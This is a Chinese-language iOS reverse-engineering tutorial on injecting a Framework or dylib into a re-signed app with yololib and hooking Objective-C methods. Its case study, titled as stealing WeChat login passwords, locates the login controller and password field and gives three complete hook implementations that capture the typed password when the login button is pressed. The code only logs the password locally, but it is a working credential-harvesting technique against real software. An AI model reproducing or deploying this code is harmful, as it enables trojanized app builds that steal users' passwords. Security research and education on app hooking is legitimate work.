iOS逆向-代码注入

代码注入

一般修改原始的程序，是利用代码注入的方式，注入代码就会选择利用FrameWork或者Dylib等三方库的方式注入。

Framework注入

一.通过Xcode新建Framwork，将库安装进入APP包
二.通过yololib注入Framwork库路径。命令：$yololib（空格）MachO文件路径（空格）库路径

BA265A10860294D60FC282E3FCC2F347.png

也可通过脚本注入:

yololib "$TARGET_APP_PATH/$APP_BINARY" "Frameworks/JensenHook.framework/JensenHook"

三.注入成功的库路径会写入到MachO文件的LC_LOAD_DYLIB字段中

dylib注入

一.通过Xcode新建Dylib库（注意：Dylib属于MacOS所以需要修改属性,baseSDK以及codeSign）
二.添加Target依赖，让Xcode将自定义Dylib文件打包进入APP包。
三.利用yololib进行注入。

多种HOOK方式

class_addMethod方式：

利用AddMethod方式，让原始方法可以被调用，不至于因为找不到SEL而崩溃

class_replaceMethod方式：

利用class_replaceMethod，直接给原始的方法替换IMP

method_setImplementation方式：

利用method_setImplementation，直接重新赋值原始的新的IMP

案例分析-窃取微信登录的密码

准备工作

一. 重签名可运行的程序
对重签名不了解的同学可以查看:(https://www.jianshu.com/p/0fa6352c3ca1)
二.classdump工具，并导出Wechat.app的所有头文件。

8.png

导出后文件大致如下:

7.png

使用view debug对微信的登录界面进行动态分析。

1.png

要窃取微信的密码,就需要在点击登录按钮的时候，获取到控件中的密码, 就完成了。

9.png

view debug下点击登录按钮,找到登录按钮的Target是WCAccountMainLoginViewController,Action是onNext，在lldb下,尝试调用WCAccountMainLoginViewController的onNext实例方法，可以调用成功。

10.png

在WCAccountMainLoginViewController的头文件中,也能找到onNext方法，这样，点击按钮的方法就找到了，接下来，我们需要找到密码框控件。

2.png

通过在view debug找到了有密码的控件是WCUITextField,在lldb下查找控件的nextResponder, 一直往上查找找到了WCAccountMainLoginViewController。

3.png

在WCAccountMainLoginViewController的头文件下查找到了_textFieldUserPwdItem, 顺着控件的类型WCAccountTextFieldItem往下找,

4.png

没有找到WCUITextField密码控件,于是查找它的父类WCBaseTextFieldItem

5.png

在WCBaseTextFieldItem中找到了WCUITextField，在lldb下尝试一下能否找到：

6.png

写逻辑代码注入实现,(这里按照多种hook的方式,提供了三种代码)

第一种方式:

#import "InjectCode.h"
#import 

@implementation InjectCode

+(void)load {
    NSLog(@"Framework注入成功");
    Method * method = class_getInstanceMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(onNext));
    BOOL didAdd = class_addMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(jensenLogin), (IMP)myLogin, "v@:");
    method_exchangeImplementations(method, class_getInstanceMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(jensenLogin)));
}
    
void myLogin(id self,SEL sel) {
    NSString * pwd = [[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"] performSelector:@selector(text)];
    NSLog(@"获取到密码:%@",pwd);
     [self performSelector:@selector(jensenLogin)];
}
    
@end

第二种方式:

#import "InjectCode.h"
#import 

@implementation InjectCode

IMP (* oldLogin)(id self,SEL cmd);
    
+(void)load {
    NSLog(@"Framework注入成功");

    oldLogin = class_getMethodImplementation(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(onNext));
 class_replaceMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(onNext), myLogin, "v@:");
}
    
void myLogin(id self,SEL sel) {
    NSString * pwd = [[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"] performSelector:@selector(text)];
    NSLog(@"获取到密码:%@",pwd);
    oldLogin(self,sel);
}
    
@end

第三种方式:

#import "InjectCode.h"
#import 

@implementation InjectCode

IMP (* oldLogin)(id self,SEL cmd);
    
+(void)load {
    NSLog(@"Framework注入成功");

     Method * onNext = class_getInstanceMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(onNext));
    oldLogin = method_getImplementation(onNext);
    method_setImplementation(onNext, (IMP)myLogin);
}
    
void myLogin(id self,SEL sel) {
    NSString * pwd = [[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"] performSelector:@selector(text)];
    NSLog(@"获取到密码:%@",pwd);
    oldLogin(self,sel);
}
    
@end